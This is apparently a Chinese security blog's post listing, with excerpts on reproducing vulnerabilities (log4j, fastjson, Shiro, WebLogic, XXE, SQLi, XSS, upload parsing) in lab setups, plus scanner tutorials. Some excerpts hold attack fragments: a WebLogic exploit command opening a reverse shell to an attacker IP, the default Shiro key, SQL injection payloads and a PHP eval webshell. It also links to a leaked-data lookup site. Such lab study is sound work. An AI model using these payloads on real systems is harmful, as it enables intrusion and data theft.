- 博客(152)
- 资源 (15)
- 收藏
- 关注
RSS订阅原创 log4j CVE-2021-44228 RCE漏洞复现
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面。这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动。1.准备payload。
2023-11-07 11:21:30
1261
原创 Fastjson 1.2.47 RCE漏洞复现
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。修改用户信息发现有回显。2.开启http服务。
2023-11-07 09:21:09
470
原创 fastjson 1.2.24 rce漏洞复现
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。把编译好的class文件传到外网系统中,并在class文件所在的目录,Python起一个http服务。访问http://192.168.232.131:8090/即可看到JSON格式的输出。
2023-11-06 18:51:03
435
原创 shiro-cve2016-4437漏洞复现
在 1.2.4 版本前, 加密的用户信息序列化后存储在名为remember-me的Cookie中,而且是默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==,可攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段。
2023-11-06 16:36:49
266
原创 weblogic弱口令漏洞复现
解密后得到密码Oracle@123,用户名是weblogic。上传成功后点下一步,选将此部署安装为应用程序,设置应用名称。选部署档案,上传hello.war。将密文copy到*.dat文件。使用解密后的账号登录后台。
2023-11-06 15:04:56
480
原创 Weblogic ssrf漏洞复现
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上;SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以这个请求中的身份来访问其他服务器的资源。产生的原因:服务器端的验证并没有对其请求获取图片的参数(image=)做出严格的过滤以及限制,导致A网站可以从其他服务器的获取数据。安全的网站应接收请求后,检测请求的合法性。或者使用以下工具探测。
2023-11-06 08:56:08
497
原创 CVE-2023-21839 weblogic rce漏洞复现
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。
2023-11-04 22:32:11
2182
原创 Hydra post登录框爆破
可以看到错误时都是1523,将该值替换到 if content_size!取出发送数据包:username=adb&password=133&submit=Login。同时获取路径:/pikachu/vul/burteforce/bf_form.php。然后开启print(len(response.text))获取错误登录时的长度。然后准备一个python脚本,将路径和ip替换到相应位置,如下所示。提取其中的POST路径:/dvwa/login.php。登录一个无验证码和token的页面,同时抓包拦截。
2023-11-04 10:40:11
1207
原创 Xray+awvs联动扫描
设置完后点全部扫描xray那边就可以开始接收awvs的爬虫结果进行扫描了。然后准备目标csv文件,每行一个url或ip然后加个逗号。对导进来的每个目标点进去设置代理。接着awvs导入csv。首先xray开启监听。
2023-11-02 07:47:39
775
原创 使用whatweb和python批量获取指纹信息
执行后记得不要关闭,需等执行完毕才能生成result.txt。该程序去除了whatweb输出的一些乱码。
2023-10-24 12:26:33
282
1
原创 Xray联动RAD实现自动扫描教程
注意如果是本地的靶场,不要用http://127.0.0.1,而是用http://192.168.xxx.xxx不然没数据的。可以看出用这种方法还是比较稳定高效的,个人觉得比xray+crawlergo的方式好,后续再做个批量子域名自动扫描的。xray下载地址:https://github.com/chaitin/xray。Rad下载地址:https://github.com/chaitin/rad。启动后xray能自动抓取rad送过来的链接并对其扫描。
2023-10-22 18:31:40
965
原创 Xray联动crawlergo自动扫描漏洞教程
然后本地开始使用xray监听127.0.0.1:7777,脚本编写默认监听7777端口,联动本质为通过脚本将crawlergo爬去的目标数据发送给正在监听的xray,然后实现目标的漏洞检查;xray下载: https://github.com/chaitin/xray/releases。把目标url写进targets.txt,一行一个url。将launcher.py里的路径改为自己谷歌的路径。执行后xray开始漏洞扫描,可以发现已经扫到漏洞。xray和crawlergo联动。三、启动crawlergo。
2023-10-22 10:10:27
607
原创 nessus安装使用过程
这样安装好后,不能再重启nessus服务,如果重启之后他会再次匹配plugin_feed_info.inc信息,匹配失败就会删除plugins的内容,所以大家安装在虚拟机,拍个快照即可。使用激活码和挑战码下载插件包all-2.0.tar.gz 和版本文件nessus.license。将all-2.0.tar.gz和nessus.license复制到Nessus安装目录。将以上内容写进plugin_feed_info.inc。将plugin_feed_info.inc替换到。cmd管理员权限执行。
2023-10-20 21:18:46
1356
2
原创 渗透测试逻辑漏洞挖掘思路
边界值问题 : 正常的逻辑是用户购买商品,然后价格累加得到一个总价进行扣款。这个时候就会产生逻辑问题:如果说用户购买的商品是负数了,那么计算的总数就是负数。反过来钱给用户顺序执行缺陷:正常的逻辑是 a-b-c-d 循环渐进的进行流程操作。这个时候就会产生逻辑问题:可以直接从中绕过某一个过程进入到下一步操作。如果说有一项是支付的操作,那么也就会产生支付绕过,如果说有一项是验证机制,就会绕过验证直接进入下一步。
2023-10-14 13:47:50
318
原创 渗透测试漏洞挖掘技巧
他的逻辑应该是这样的,用户输入手机号——>后端判断该手机号是否在30秒或者60秒内请求过——>如果没有,判断发送过来的手机号是够是11位的纯数字,如果不是,去掉非数字字符——>和数据库中的手机号比对,是够存在于数据库中,如果存在那么向该手机发送验证码。这在前端使用添加的自定义HTTP标头(X-Custom-IP-Authorization)的情况下可能有效-例如,当它用于标识通过负载均衡器连接到Web服务器的客户端的原始IP地址时。在本示例中,作者可以确定数据库名称的长度为10个字符,作为概念证明。
2023-10-14 12:55:02
582
原创 未授权和代码执行漏洞特征和检测方法
查看在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在fastjson-1.2.*.**.jar格式的jar文件,或者抓包发现被测应用系统的响应报文中包含“com.alibaba.fastjson”字符串,则需检测是否存在fastjson反序列化漏洞。s=captcha,若响应包中包含phpinfo信息,则说明存在代码执行漏洞。依次修改URL末尾的端口号为常见的22,80,443,7001,8080等端口,若页面中根据端口号不同出现如下字符串,说明存在SSRF漏洞。
2023-10-13 14:46:19
1453
原创 XXE漏洞复现实操
(1)XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞, XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据。(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致漏洞。如果能够建立连接,那么服务器端的ncat会收到相应的请求信息。
2023-10-13 12:33:40
997
原创 appscan的两种手动探索扫描方式
使用内置浏览器主要是需要手动添加cookie头,不要在浏览器里登录,可以用F12,在网络里抓取。记住这个端口号填appscan里刚才出现的那个,每次打开都会变,所以每次这里都需要改。将这个cookie复制出来,完全扫描配置里选探索–参数和cookie,右边选定制头。手动测试完毕后点击上图的停止记录就行,记得不要把自己不想测试的其他网站也勾上。然后回到主界面,手动探索选AppScan Chromium。最后选稍后启动扫描,然后回到主界面,手动探索里选外部设备。然后保存,启用这个代理就行。
2023-10-05 13:24:34
774
原创 使用appscan定时批量扫描方法
appscan的窗口模式中允许用户一次只能选择一个扫描目标,但是如果想批量扫描多个网站的时候可以通过appscan安装文件夹下的AppScanCMD.exe工具来操作,具体操作如下。同样道理添加另一个站点,比如http://127.0.0.1:9008/,也是稍后扫描并保存。首先按常规操作添加2个站点,但是不立即扫描。然后双击这关bat脚本就会批量扫描所有站点。然后点完成到时就会自动执行批处理扫描了。自己要扫描几个网站网上加就行。接着我们编辑一个批处理脚本。输入一个未用过的任务名。
2023-10-05 10:52:48
1017
原创 渗透测试信息收集方法笔记
git,.svn,.DS_Store,WEB-INF/web.xml以及.gz,.rar…zip,.tar.gz,.bak,.tar。1、华为情报 https://isecurity.huawei.com/sec/web/intelligencePortal.do。2、被黑站点统计 https://www.hacked.com.cn/2、天眼查https://www.tianyancha.com/1、钟馗之眼https://www.zoomeye.org/1、社工库 https://sgk66.cc/
2023-10-03 15:19:45
1289
3
原创 使用sqlmap总是提示需要302跳转重新登录的解决方法
如果给了cookie但发现还是提示需要重新登录,且按它给的提示发现还是找不到注入点,原因是url没有加引号。如果在命令中不指定cookie,sqlmap在执行时会提示需要重新登录。url加了双引号后解决问题。
2023-10-01 11:49:26
682
1
原创 公认黑客守则
1、不要恶意的破坏任何系统,恶意的破坏他人的软件或服务器将要承担法律责任,如果你只是使用计算机,也是非法的,千万不要破坏别人的文件或数据。2、不要修改别人的任何系统文件,如果你是为了进入而修改它,请在达到目的以后将它还原(恢复)回去。10、多读书,读遍有关系统安全或系统漏洞的文件,会复现漏洞,修复漏洞。12、不会编程的黑客不是一个好黑客,不会运维的黑客也不是一个好黑客。3、不要轻易的将你hack的站点(或密码)告诉你不信任的朋友。9、将你的笔记本(pc),移动硬盘这些设备放置在安全的地方。
2023-09-30 18:14:01
392
原创 使用python脚本的时间盲注完整步骤
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based。tips:title=,&action=search需要使用burp抓包获得。我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名。
2023-09-30 12:05:12
595
原创 xss测试步骤总结
先看bp,再看回显,测试常规xss语句,接着看F12上下文,然后是构造闭合,最后是依次测试绕过方法,成功的时候要能得到一个可以复现的url。
2023-09-28 09:34:26
2109
原创 sqli-labs注入方法总结
用户名:1" ) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(用户名:1’) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(用户名:1" union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+删除bp原先的cookie,使用以下语句。
2023-09-23 18:07:32
326
1
原创 渗透测试信息收集方法和工具分享
ThreatScan在线网站:https://scan.top15.cn/web/portscan。端口扫描站长工具(老熟人了):http://tool.chinaz.com/port/站长之家ping检测(没错又是它):http://ping.chinaz.com/天眼查:https://beian.tianyancha.com/子域名爆破:https://phpinfo.me/domain/ICP备案查询:http://icp.chinaz.com/c段查询:phpinfo.me/bind.php。
2023-09-18 10:06:47
905
原创 xss-labs实操
“Str”>,也就是说script在引号里面,那么是执行不了的,需要闭合操作,因此前面加个”>扔给前面的雨具语句。14关程序有误,链接点不进去,好像是个上传页面,要上传一个有exif漏洞的图片,算了,知道咋回事就行。输入:javascript:alert(‘xss’)//http://www.baidu.com。因此只能再寻找方法:">xss。大小写绕过:">xss。
2023-09-17 13:58:28
188
原创 burp+IE 微信小程序抓包教程
比如点击粤省事,发现进入时就抓到了很多包,不需要开拦截也可以。然后Internet选项切换到连接,选择下面的局域网设置。选择刚才新增的监听端口,点击证书导入导出。将其存出来即可,比如保存为2.cer。找一个没用的端口,使用以下方式新增。浏览里选择受信任的根证书颁发机构。打开IE的Internet选项。输入BURP里新增的端口即可。点导入,选择刚才导出的证书。
2023-09-17 11:34:51
324
原创 Burpsuite xssvalidator测试工具使用方法
然后开始攻击,123456下有1的表示该payload可用,我们可以点一个试下。Payload Processing选择xss validator。Paylod type选择Extension-generated。然后cmd终端里执行 phantomjs.exe xss.js。Option的Grep-match保留一个123456就行。下载phantomjs-2.1.1-windows。选择注入参数为参数,比如这里的test。Extend搜索xss可以找到该工具。打开一个有xss的网页测试下。
2023-09-15 14:27:43
358
原创 windows2003 IIS6.0解析漏洞
(文件传输协议(FTP)服务可勾选也可不勾选,要用到这个服务的就勾选),勾选后先不要着急点确定。1.在组件向导中找到【应用程序服务器】双击打开,勾选【Internet信息服务(IIS)】和【应用程序服务器控制台】,勾选后先不要那么快点确定。4.点击【下一步】配置组件,期间会提示需要一些文件,我们只需要将文件来源选择到刚开始解压出来的i386文件夹,点击确定即可。.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。.asp:1.jpg IIS6.0同样会将文件当做asp文件解析。
2023-09-14 18:28:50
304
原创 Win7 IIS7解析漏洞复现
文件上传使用白名单做限制,只能上传图片文件,导致脚本文件无法上传,上传图片马绕过白名单文件上传的验证,但是图片马又无法解析,利用IIS7.5文件解析漏洞的特点:任意文件名/任意文件名.php,从而解析脚本文件。安装并打开旧版pikachu,切换版本为php-5.2.17+IIS。打开常见HTTP功能和应用程序开发功能。网页访问127.0.0.1::8980。5.使用IIS配置pikachu。3.再次刷新页面成功复现漏洞。4.pikachu切换版本。创建测试PHP复现漏洞。1.开启漏洞利用条件。
2023-09-14 12:35:25
515
原创 Apache解析漏洞复现
php),该命令会将后缀中只要含有.php的文件都会被处理程序解析,这导致攻击者可通过多后缀绕过文件上传限制以.php结尾的机制,并使之被处理程序执行。配置apache时,对于apache配置不熟练,配置命令不清楚,在配置PHP文件处理程序时,配置命令存在问题:位于漏洞环境目录的。$ 还会匹配到字符串结尾的换行符,这导致在上传时,添加一个换行符也能被正常解析,并且能够绕过系统的黑名单检测。再注释掉原本的处理出现配置命令AddHandler application/x-httpd-php .php。
2023-09-14 12:32:58
656
原创 Nginx 文件解析漏洞复现
Nginx文件解析漏洞算是一个比较经典的漏洞,接下来我们就通过如下步骤进行漏洞复现,以及进行漏洞的修复。使用界面的上传功能上传一个jpg图片马,jpg内容是@eval($_POST[“fname”]);访问:http://192.168.25.128/uploadfiles/nginx.png。然后我们输入/.php,可以发现并没有出现文件为找到,而是出现了php的配置信息。版本条件:IIS 7.0/IIS 7.5/ Nginx
2023-09-14 12:29:27
513
原创 upload-labs文件上传靶场实操
该文件的意思是,只要遇到文件名中包含有”backlion.jpg”字符串的任意文件,统一被当作php执行。如果这个” backlion.jpg”的内容是一句话木马,即可利用中国菜刀进行连接。即既然它以Content-Type为准,那么我就先给他一个正确的Content-Type,然后再改后缀为.php。但是以上方法对nts版本的apache无效,需使用类似如下的版本。只能上传图片,先上传一个jpg格式的图片,然后抓包改格式。直接上传非php文件,使用本地包含文件getshell。
2023-09-13 15:52:02
503
原创 帝国EmpireCMS_7.5_SC_UTF8漏洞复现
然后执行:http://127.0.0.1/EmpireCMS_7.5_SC_UTF8/upload/e/install/index.php。EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名。访问备份文件目录下的config.php,将readme.txt改为config.php。进入后台,依次访问 -> [系统]-[系统设置]-[备份与恢复数据]-[备份数据]下载地址:http://www.phome.net/download/输入数据库用户名密码。
2023-09-13 09:37:20
754
原创 DedeCMS_v5.7其他漏洞复现
其中aHR0cDovL3d3dy5iYWlkdS5jb20=是http://www.baidu.com的base64编码。管理员在添加用户购买商品的配送方式时,可能会触发存储型xss。进入后台—>会员—>配货方式设置—>增加一个配货方式。二、后台shops_delivery_存储型XSS。后台modifytmp.inc被写入了新内容。三、sys_verifies后台文件写入。用户在购买商品时会自动弹出配送方式列表。版本:5.7sp1、5.7sp2。访问后发现直接转到百度。
2023-09-12 12:15:22
658
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人